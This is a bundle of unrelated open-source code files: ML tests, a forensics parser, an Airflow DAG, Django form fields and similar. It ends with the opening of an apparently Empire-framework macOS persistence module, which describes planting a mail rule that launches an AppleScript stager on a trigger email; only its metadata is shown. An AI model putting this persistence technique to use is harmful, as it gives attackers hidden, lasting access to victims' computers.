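
values = torch.rand(3, 100)          # rows: U, V, confidence (smaller = more confident here)
count, search_count_multiplier = 8, 4.0
_, sorted_conf = torch.sort(values[2])
search_count = min(int(count * search_count_multiplier), values.shape[1])
sample_from_top = random.sample(range(search_count), count)
index_sample = sorted_conf[:search_count][sample_from_top]
print(sorted(index_sample.tolist()))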
tests/nonrealtime/test_nonrealtime_Session_pickle.py | butayama/supriya | 191 | 12750447 |
import pickle
import supriya
def test_01():
old_session = supriya.Session()
new_session = pickle.loads(pickle.dumps(old_session))
old_bundles = old_session.to_osc_bundles()
new_bundles = new_session.to_osc_bundles()
assert old_bundles == new_bundles
def test_02():
old_session = supriya.Session()
group = old_session.add_group(offset=5)
group.add_synth(offset=10, duration=10)
new_session = pickle.loads(pickle.dumps(old_session))
old_bundles = old_session.to_osc_bundles()
new_bundles = new_session.to_osc_bundles()
assert old_bundles == new_bundles
|
silo/benchmarks/stats_runner.py | anshsarkar/TailBench | 274 | 12750454 |
#!/usr/bin/env python
import itertools as it
import platform
import math
import subprocess
import sys
import time
import multiprocessing as mp
import os
BUILDDIR='../out-perf.ectrs'
if __name__ == '__main__':
(_, out) = sys.argv
args = [
os.path.join(BUILDDIR, 'benchmarks/dbtest'),
'--bench-opts', '--workload-mix 0,0,100,0',
'--stats-server-sockfile' , '/tmp/silo.sock',
'--num-threads', '28',
'--numa-memory', '96G',
'--scale-factor', '160000',
'--parallel-loading',
'--runtime', '30',
]
env = dict(os.environ)
env['DISABLE_MADV_WILLNEED'] = '1'
p0 = subprocess.Popen(args, stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), env=env)
time.sleep(1.0) # XXX: hacky
args = [os.path.join(BUILDDIR, 'stats_client'), '/tmp/silo.sock', 'dbtuple_bytes_allocated:dbtuple_bytes_freed']
with open(out, 'w') as fp:
p1 = subprocess.Popen(args, stdin=open('/dev/null', 'r'), stdout=fp)
p0.wait()
p1.wait()
|
tensorflow/lite/tools/test_utils.py | EricRemmerswaal/tensorflow | 190,993 | 12750496 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests.
"""
import flatbuffers
from tensorflow.lite.python import schema_py_generated as schema_fb
TFLITE_SCHEMA_VERSION = 3
def build_mock_flatbuffer_model():
"""Creates a flatbuffer containing an example model."""
builder = flatbuffers.Builder(1024)
schema_fb.BufferStart(builder)
buffer0_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStartDataVector(builder, 10)
builder.PrependUint8(9)
builder.PrependUint8(8)
builder.PrependUint8(7)
builder.PrependUint8(6)
builder.PrependUint8(5)
builder.PrependUint8(4)
builder.PrependUint8(3)
builder.PrependUint8(2)
builder.PrependUint8(1)
builder.PrependUint8(0)
buffer1_data_offset = builder.EndVector(10)
schema_fb.BufferStart(builder)
schema_fb.BufferAddData(builder, buffer1_data_offset)
buffer1_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStart(builder)
buffer2_offset = schema_fb.BufferEnd(builder)
schema_fb.ModelStartBuffersVector(builder, 3)
builder.PrependUOffsetTRelative(buffer2_offset)
builder.PrependUOffsetTRelative(buffer1_offset)
builder.PrependUOffsetTRelative(buffer0_offset)
buffers_offset = builder.EndVector(3)
string0_offset = builder.CreateString('input_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape0_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string0_offset)
schema_fb.TensorAddShape(builder, shape0_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 0)
tensor0_offset = schema_fb.TensorEnd(builder)
schema_fb.QuantizationParametersStartMinVector(builder, 5)
builder.PrependFloat32(0.5)
builder.PrependFloat32(2.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
quant1_min_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartMaxVector(builder, 5)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
builder.PrependFloat32(-50.0)
builder.PrependFloat32(1.0)
builder.PrependFloat32(2.0)
quant1_max_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartScaleVector(builder, 5)
builder.PrependFloat32(3.0)
builder.PrependFloat32(4.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(6.0)
builder.PrependFloat32(7.0)
quant1_scale_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartZeroPointVector(builder, 5)
builder.PrependInt64(1)
builder.PrependInt64(2)
builder.PrependInt64(3)
builder.PrependInt64(-1)
builder.PrependInt64(-2)
quant1_zero_point_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStart(builder)
schema_fb.QuantizationParametersAddMin(builder, quant1_min_offset)
schema_fb.QuantizationParametersAddMax(builder, quant1_max_offset)
schema_fb.QuantizationParametersAddScale(builder, quant1_scale_offset)
schema_fb.QuantizationParametersAddZeroPoint(builder,
quant1_zero_point_offset)
quantization1_offset = schema_fb.QuantizationParametersEnd(builder)
string1_offset = builder.CreateString('constant_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape1_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string1_offset)
schema_fb.TensorAddShape(builder, shape1_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 1)
schema_fb.TensorAddQuantization(builder, quantization1_offset)
tensor1_offset = schema_fb.TensorEnd(builder)
string2_offset = builder.CreateString('output_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape2_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string2_offset)
schema_fb.TensorAddShape(builder, shape2_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 2)
tensor2_offset = schema_fb.TensorEnd(builder)
schema_fb.SubGraphStartTensorsVector(builder, 3)
builder.PrependUOffsetTRelative(tensor2_offset)
builder.PrependUOffsetTRelative(tensor1_offset)
builder.PrependUOffsetTRelative(tensor0_offset)
tensors_offset = builder.EndVector(3)
schema_fb.SubGraphStartInputsVector(builder, 1)
builder.PrependInt32(0)
inputs_offset = builder.EndVector(1)
schema_fb.SubGraphStartOutputsVector(builder, 1)
builder.PrependInt32(2)
outputs_offset = builder.EndVector(1)
schema_fb.OperatorCodeStart(builder)
schema_fb.OperatorCodeAddBuiltinCode(builder, schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddDeprecatedBuiltinCode(builder,
schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddVersion(builder, 1)
code_offset = schema_fb.OperatorCodeEnd(builder)
schema_fb.ModelStartOperatorCodesVector(builder, 1)
builder.PrependUOffsetTRelative(code_offset)
codes_offset = builder.EndVector(1)
schema_fb.OperatorStartInputsVector(builder, 2)
builder.PrependInt32(0)
builder.PrependInt32(1)
op_inputs_offset = builder.EndVector(2)
schema_fb.OperatorStartOutputsVector(builder, 1)
builder.PrependInt32(2)
op_outputs_offset = builder.EndVector(1)
schema_fb.OperatorStart(builder)
schema_fb.OperatorAddOpcodeIndex(builder, 0)
schema_fb.OperatorAddInputs(builder, op_inputs_offset)
schema_fb.OperatorAddOutputs(builder, op_outputs_offset)
op_offset = schema_fb.OperatorEnd(builder)
schema_fb.SubGraphStartOperatorsVector(builder, 1)
builder.PrependUOffsetTRelative(op_offset)
ops_offset = builder.EndVector(1)
string3_offset = builder.CreateString('subgraph_name')
schema_fb.SubGraphStart(builder)
schema_fb.SubGraphAddName(builder, string3_offset)
schema_fb.SubGraphAddTensors(builder, tensors_offset)
schema_fb.SubGraphAddInputs(builder, inputs_offset)
schema_fb.SubGraphAddOutputs(builder, outputs_offset)
schema_fb.SubGraphAddOperators(builder, ops_offset)
subgraph_offset = schema_fb.SubGraphEnd(builder)
schema_fb.ModelStartSubgraphsVector(builder, 1)
builder.PrependUOffsetTRelative(subgraph_offset)
subgraphs_offset = builder.EndVector(1)
signature_key = builder.CreateString('my_key')
input_tensor_string = builder.CreateString('input_tensor')
output_tensor_string = builder.CreateString('output_tensor')
# Signature Inputs
schema_fb.TensorMapStart(builder)
schema_fb.TensorMapAddName(builder, input_tensor_string)
schema_fb.TensorMapAddTensorIndex(builder, 1)
input_tensor = schema_fb.TensorMapEnd(builder)
# Signature Outputs
schema_fb.TensorMapStart(builder)
schema_fb.TensorMapAddName(builder, output_tensor_string)
schema_fb.TensorMapAddTensorIndex(builder, 2)
output_tensor = schema_fb.TensorMapEnd(builder)
schema_fb.SignatureDefStartInputsVector(builder, 1)
builder.PrependUOffsetTRelative(input_tensor)
signature_inputs_offset = builder.EndVector(1)
schema_fb.SignatureDefStartOutputsVector(builder, 1)
builder.PrependUOffsetTRelative(output_tensor)
signature_outputs_offset = builder.EndVector(1)
schema_fb.SignatureDefStart(builder)
schema_fb.SignatureDefAddSignatureKey(builder, signature_key)
schema_fb.SignatureDefAddInputs(builder, signature_inputs_offset)
schema_fb.SignatureDefAddOutputs(builder, signature_outputs_offset)
signature_offset = schema_fb.SignatureDefEnd(builder)
schema_fb.ModelStartSignatureDefsVector(builder, 1)
builder.PrependUOffsetTRelative(signature_offset)
signature_defs_offset = builder.EndVector(1)
string4_offset = builder.CreateString('model_description')
schema_fb.ModelStart(builder)
schema_fb.ModelAddVersion(builder, TFLITE_SCHEMA_VERSION)
schema_fb.ModelAddOperatorCodes(builder, codes_offset)
schema_fb.ModelAddSubgraphs(builder, subgraphs_offset)
schema_fb.ModelAddDescription(builder, string4_offset)
schema_fb.ModelAddBuffers(builder, buffers_offset)
schema_fb.ModelAddSignatureDefs(builder, signature_defs_offset)
model_offset = schema_fb.ModelEnd(builder)
builder.Finish(model_offset)
model = builder.Output()
return model
def load_model_from_flatbuffer(flatbuffer_model):
"""Loads a model as a python object from a flatbuffer model."""
model = schema_fb.Model.GetRootAsModel(flatbuffer_model, 0)
model = schema_fb.ModelT.InitFromObj(model)
return model
def build_mock_model():
"""Creates an object containing an example model."""
model = build_mock_flatbuffer_model()
return load_model_from_flatbuffer(model)
|
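# Illustrative sketch (not from the repository above): exercising the helpers defined
# in this file. Field names follow the flatbuffers object API for the values written
# above ('model_description', three tensors, one ADD operator code).
model = build_mock_model()
print(model.description)                  # b'model_description'
print(len(model.subgraphs[0].tensors))    # 3 (input, constant, output)
print(len(model.operatorCodes))           # 1 (ADD)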
django_quicky/namegen/__init__.py | sametmax/django-quicky | 149 | 12750504 |
import pkg_resources
pkg_resources.declare_namespace(__name__)
from .namegen import NameGenerator
namegen = NameGenerator()
|
indent.py | Hengle/MemoryProfiler | 184 | 12750526 |
#!/usr/bin/env python3
import os
import os.path as p
def iter_dir(base_path:str, indent:str):
node_list = os.listdir(base_path)
for n in range(len(node_list)):
name = node_list[n]
nest_path = p.join(base_path, name)
if n + 1 < len(node_list):
print('{}├─{}'.format(indent, name))
else:
print('{}└─{}'.format(indent, name))
if p.isdir(nest_path):
if n + 1 < len(node_list):
iter_dir(nest_path, indent=indent + '│ ')
else:
iter_dir(nest_path, indent=indent + ' ')
if __name__ == '__main__':
iter_dir('memory', '') |
tests/torch/pruning/filter_pruning/test_set_pruning_rate.py | sarthakpati/nncf | 310 | 12750555 |
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
import numpy as np
from nncf.torch.pruning.filter_pruning.algo import FilterPruningController
from tests.torch.helpers import create_compressed_model_and_algo_for_test
from tests.torch.helpers import check_correct_nncf_modules_replacement
from tests.torch.pruning.helpers import get_basic_pruning_config
from tests.torch.pruning.helpers import BigPruningTestModel
def create_pruning_algo_with_config(config):
"""
Create filter_pruning with default params.
:param config: config for the algorithm
:return pruned model, pruning_algo, nncf_modules
"""
config['compression']['algorithm'] = 'filter_pruning'
model = BigPruningTestModel()
pruned_model, pruning_algo = create_compressed_model_and_algo_for_test(BigPruningTestModel(), config)
# Check that all modules was correctly replaced by NNCF modules and return this NNCF modules
_, nncf_modules = check_correct_nncf_modules_replacement(model, pruned_model)
return pruned_model, pruning_algo, nncf_modules
@pytest.mark.parametrize(
('all_weights', 'pruning_rate_to_set', 'ref_pruning_rates', 'ref_global_pruning_rate'),
[
(False, 0.5, [0.5, 0.5], 0.5),
(True, 0.5, [0.28125, 0.60937], 0.5),
(False, {0: 0.6, 1: 0.8}, [0.5, 0.75], 0.69986),
]
)
def test_setting_pruning_rate(all_weights, pruning_rate_to_set, ref_pruning_rates, ref_global_pruning_rate):
"""
Test setting global and groupwise pruning rates via the set_pruning_rate method.
"""
# Creating algorithm with empty config
config = get_basic_pruning_config(input_sample_size=[1, 1, 8, 8])
config['compression']['pruning_init'] = 0.2
config['compression']['params']['all_weights'] = all_weights
_, pruning_controller, _ = create_pruning_algo_with_config(config)
assert isinstance(pruning_controller, FilterPruningController)
pruning_controller.set_pruning_rate(pruning_rate_to_set)
groupwise_pruning_rates = list(pruning_controller.current_groupwise_pruning_rate.values())
assert np.isclose(groupwise_pruning_rates, ref_pruning_rates).all()
assert np.isclose(pruning_controller.pruning_rate, ref_global_pruning_rate).all()
def test_can_set_compression_rate_in_filter_pruning_algo():
"""
Test setting the global pruning rate via the compression_rate property.
"""
# Creating algorithm with empty config
config = get_basic_pruning_config(input_sample_size=[1, 1, 8, 8])
config['compression']['pruning_init'] = 0.2
_, pruning_controller, _ = create_pruning_algo_with_config(config)
pruning_controller.compression_rate = 0.65
assert pytest.approx(pruning_controller.compression_rate, 1e-2) == 0.65
|
plaso/parsers/networkminer.py | cugu-stars/plaso | 1,253 | 12750565 |
# -*- coding: utf-8 -*-
"""Parser for NetworkMiner .fileinfos files."""
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import dsv_parser
from plaso.parsers import manager
class NetworkMinerEventData(events.EventData):
"""NetworkMiner event Data.
Attributes:
destination_ip (str): Destination IP address.
destination_port (str): Destination port number.
file_details (string): Details about the file.
file_md5 (string): MD5 hash of the file.
file_path (string): File path to where it was downloaded.
file_size (string): Size of the file.
filename (string): Name of the file.
source_ip (str): Originating IP address.
source_port (str): Originating port number.
"""
DATA_TYPE = 'networkminer:fileinfos:file'
def __init__(self):
super(NetworkMinerEventData, self).__init__(data_type=self.DATA_TYPE)
self.destination_ip = None
self.destination_port = None
self.file_details = None
self.file_md5 = None
self.file_path = None
self.file_size = None
self.filename = None
self.source_ip = None
self.source_port = None
class NetworkMinerParser(dsv_parser.DSVParser):
"""Parser for NetworkMiner .fileinfos files."""
NAME = 'networkminer_fileinfo'
DATA_FORMAT = 'NetworkMiner .fileinfos file'
COLUMNS = (
'source_ip', 'source_port', 'destination_ip', 'destination_port',
'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2',
'file_details', 'unused4', 'timestamp')
MIN_COLUMNS = 13
def ParseRow(self, parser_mediator, row_offset, row):
"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""
event_data = NetworkMinerEventData()
if row.get('timestamp', None) != 'Timestamp':
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
for field in (
'source_ip', 'source_port', 'destination_ip',
'destination_port', 'filename', 'file_path', 'file_size', 'file_md5',
'file_details'):
setattr(event_data, field, row[field])
try:
timestamp = row.get('timestamp', None)
date_time.CopyFromStringISO8601(timestamp)
except ValueError:
parser_mediator.ProduceExtractionWarning('invalid date time value')
return
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def VerifyRow(self, parser_mediator, row):
"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
if len(row) != self.MIN_COLUMNS:
return False
# Check the date format
# If it doesn't parse, then this isn't a NetworkMiner .fileinfos file.
timestamp_value = row.get('timestamp', None)
if timestamp_value != 'Timestamp':
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
try:
date_time.CopyFromStringISO8601(timestamp_value)
except ValueError:
return False
return True
manager.ParsersManager.RegisterParser(NetworkMinerParser)
|
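# Illustrative sketch (not from the repository above): the shape of a single row as
# VerifyRow/ParseRow above expect it - a dict keyed by COLUMNS with exactly 13 entries
# and an ISO 8601 timestamp. All concrete values are made up for illustration.
sample_row = {
    'source_ip': '192.168.1.10', 'source_port': 'TCP 49152',
    'destination_ip': '10.0.0.5', 'destination_port': 'TCP 80',
    'filename': 'index.html', 'file_path': '/tmp/files/index.html',
    'file_size': '2048 B', 'unused': '', 'file_md5': 'd41d8cd98f00b204e9800998ecf8427e',
    'unused2': '', 'file_details': 'text/html', 'unused4': '',
    'timestamp': '2021-06-01T12:34:56.000000+00:00'}
assert len(sample_row) == 13   # matches NetworkMinerParser.MIN_COLUMNS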
chapter05/dags/02_branch_task.py | add54/Data_PipeLine_Apache_Airflow | 303 | 12750571 | import airflow
from airflow import DAG
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
ERP_CHANGE_DATE = airflow.utils.dates.days_ago(1)
def _fetch_sales(**context):
if context["execution_date"] < ERP_CHANGE_DATE:
_fetch_sales_old(**context)
else:
_fetch_sales_new(**context)
def _fetch_sales_old(**context):
print("Fetching sales data (OLD)...")
def _fetch_sales_new(**context):
print("Fetching sales data (NEW)...")
def _clean_sales(**context):
if context["execution_date"] < airflow.utils.dates.days_ago(1):
_clean_sales_old(**context)
else:
_clean_sales_new(**context)
def _clean_sales_old(**context):
print("Preprocessing sales data (OLD)...")
def _clean_sales_new(**context):
print("Preprocessing sales data (NEW)...")
with DAG(
dag_id="02_branch_function",
start_date=airflow.utils.dates.days_ago(3),
schedule_interval="@daily",
) as dag:
start = DummyOperator(task_id="start")
fetch_sales = PythonOperator(task_id="fetch_sales", python_callable=_fetch_sales)
clean_sales = PythonOperator(task_id="clean_sales", python_callable=_clean_sales)
fetch_weather = DummyOperator(task_id="fetch_weather")
clean_weather = DummyOperator(task_id="clean_weather")
join_datasets = DummyOperator(task_id="join_datasets")
train_model = DummyOperator(task_id="train_model")
deploy_model = DummyOperator(task_id="deploy_model")
start >> [fetch_sales, fetch_weather]
fetch_sales >> clean_sales
fetch_weather >> clean_weather
[clean_sales, clean_weather] >> join_datasets
join_datasets >> train_model >> deploy_model
|
tests/layer_tests/onnx_tests/test_squeeze.py | ryanloney/openvino-1 | 1,127 | 12750573 |
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import pytest
from common.onnx_layer_test_class import Caffe2OnnxLayerTest
class TestSqueeze(Caffe2OnnxLayerTest):
def create_squeeze_net(self, axes, input_shape, output_shape, ir_version):
"""
ONNX net IR net
Input->Squeeze(axes=0)->Output => Input->Reshape
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, input_shape)
output = helper.make_tensor_value_info('output', TensorProto.FLOAT, output_shape)
node_squeeze_def = onnx.helper.make_node(
'Squeeze',
inputs=['input'],
outputs=['output'],
axes=axes
)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
[node_squeeze_def],
'test_squeeze_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_squeeze_model')
#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net = None
return onnx_net, ref_net
def create_squeeze_net_const(self, axes, input_shape, output_shape, ir_version):
"""
ONNX net IR net
Input->Concat(+squeezed const)->Output => Input->Concat(+const)
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
import numpy as np
concat_axis = 0
concat_output_shape = output_shape.copy()
concat_output_shape[concat_axis] *= 2
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, output_shape)
output = helper.make_tensor_value_info('output', TensorProto.FLOAT, concat_output_shape)
const_number = np.prod(input_shape)
        constant = np.random.randint(-127, 127, const_number).astype(float)  # np.float alias is removed in recent NumPy
constant = np.reshape(constant, input_shape)
node_const_def = onnx.helper.make_node(
'Constant',
inputs=[],
outputs=['const1'],
value=helper.make_tensor(
name='const_tensor',
data_type=TensorProto.FLOAT,
dims=constant.shape,
vals=constant.flatten(),
),
)
node_squeeze_def = onnx.helper.make_node(
'Squeeze',
inputs=['const1'],
outputs=['squeeze1'],
axes=axes
)
node_concat_def = onnx.helper.make_node(
'Concat',
inputs=['input', 'squeeze1'],
outputs=['output'],
axis=concat_axis
)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
[node_const_def, node_squeeze_def, node_concat_def],
'test_squeeze_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_squeeze_model')
#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net = None
return onnx_net, ref_net
test_data_5D = [
dict(axes=[0], input_shape=[1, 2, 3, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[1], input_shape=[2, 1, 3, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[2], input_shape=[2, 3, 1, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[3], input_shape=[2, 3, 10, 1, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[4], input_shape=[2, 3, 10, 10, 1], output_shape=[2, 3, 10, 10]),
dict(axes=[0, 1], input_shape=[1, 1, 3, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 2], input_shape=[1, 3, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 3], input_shape=[1, 3, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 4], input_shape=[1, 3, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[1, 2], input_shape=[3, 1, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[1, 3], input_shape=[3, 1, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[1, 4], input_shape=[3, 1, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[2, 3], input_shape=[3, 10, 1, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[2, 4], input_shape=[3, 10, 1, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[3, 4], input_shape=[3, 10, 10, 1, 1], output_shape=[3, 10, 10]),
dict(axes=[0, 1, 2], input_shape=[1, 1, 1, 10, 10], output_shape=[10, 10]),
dict(axes=[0, 1, 3], input_shape=[1, 1, 10, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 1, 4], input_shape=[1, 1, 10, 10, 1], output_shape=[10, 10]),
dict(axes=[0, 2, 3], input_shape=[1, 10, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 2, 4], input_shape=[1, 10, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[0, 3, 4], input_shape=[1, 10, 10, 1, 1], output_shape=[10, 10]),
dict(axes=[1, 2, 3], input_shape=[10, 1, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[1, 2, 4], input_shape=[10, 1, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[1, 3, 4], input_shape=[10, 1, 10, 1, 1], output_shape=[10, 10]),
dict(axes=[2, 3, 4], input_shape=[10, 10, 1, 1, 1], output_shape=[10, 10])]
test_data_4D = [
dict(axes=[0], input_shape=[1, 3, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[1], input_shape=[3, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[2], input_shape=[3, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[3], input_shape=[3, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[0, 1], input_shape=[1, 1, 10, 10], output_shape=[10, 10]),
dict(axes=[0, 2], input_shape=[1, 10, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 3], input_shape=[1, 10, 10, 1], output_shape=[10, 10]),
dict(axes=[1, 2], input_shape=[10, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[1, 3], input_shape=[10, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[2, 3], input_shape=[10, 10, 1, 1], output_shape=[10, 10])]
test_data_3D = [
dict(axes=[0], input_shape=[1, 10, 10], output_shape=[10, 10]),
dict(axes=[1], input_shape=[10, 1, 10], output_shape=[10, 10]),
dict(axes=[2], input_shape=[10, 10, 1], output_shape=[10, 10])]
@pytest.mark.parametrize("params", test_data_5D)
@pytest.mark.nightly
def test_squeeze_5D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_4D)
@pytest.mark.nightly
def test_squeeze_4D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_3D)
@pytest.mark.nightly
def test_squeeze_3D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_5D)
@pytest.mark.nightly
def test_squeeze_const_5D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_4D)
@pytest.mark.nightly
def test_squeeze_const_4D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_3D)
@pytest.mark.nightly
def test_squeeze_const_3D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
|
mayan/apps/views/fields.py | nattangwiwat/Mayan-EDMS-recitation | 343 | 12750594 | from django import forms
from django.core.exceptions import ImproperlyConfigured
from mayan.apps.acls.models import AccessControlList
class FilteredModelFieldMixin:
def __init__(self, *args, **kwargs):
self.source_model = kwargs.pop('source_model', None)
self.permission = kwargs.pop('permission', None)
self.source_queryset = kwargs.pop('source_queryset', None)
if self.source_queryset is None:
if self.source_model:
self.source_queryset = self.source_model._meta.default_manager.all()
else:
raise ImproperlyConfigured(
'{} requires a source_queryset or a source_model to be '
'specified as keyword argument.'.format(
self.__class__.__name__
)
)
kwargs['queryset'] = self.source_queryset.none()
super().__init__(*args, **kwargs)
def reload(self):
if self.permission and self.user:
self.queryset = AccessControlList.objects.restrict_queryset(
permission=self.permission, queryset=self.source_queryset,
user=self.user
)
else:
self.queryset = self.source_queryset
class FilteredModelChoiceField(
FilteredModelFieldMixin, forms.ModelChoiceField
):
"""Single selection filtered model choice field"""
class FilteredModelMultipleChoiceField(
FilteredModelFieldMixin, forms.ModelMultipleChoiceField
):
"""Multiple selection filtered model choice field"""
|
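# Illustrative sketch (not from the repository above): one way the field could be used
# in a Django form. The Document model, the permission object and the convention of
# assigning .user before calling reload() are assumptions, not taken from this file.
from django import forms

from mayan.apps.documents.models import Document                        # assumed import path
from mayan.apps.documents.permissions import permission_document_view   # assumed import path


class DocumentPickForm(forms.Form):
    document = FilteredModelChoiceField(
        permission=permission_document_view, source_model=Document
    )

    def __init__(self, *args, **kwargs):
        user = kwargs.pop('user', None)
        super().__init__(*args, **kwargs)
        self.fields['document'].user = user   # reload() restricts the queryset by this user's ACLs
        self.fields['document'].reload()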
lib/modules/python/persistence/osx/mail.py | Gui-Luz/Empire | 5,720 | 12750630 | <gh_stars>1000+
from time import time
from random import choice
from string import ascii_uppercase
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Mail',
# list of one or more authors for the module
'Author': ['@n00py'],
# more verbose multi-line description of the module
'Description': ('Installs a mail rule that will execute an AppleScript stager when a trigger word is present in the Subject of an incoming mail.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language': 'python',
# the minimum language version needed
'MinLanguageVersion': '2.6',
# list of any references/other comments
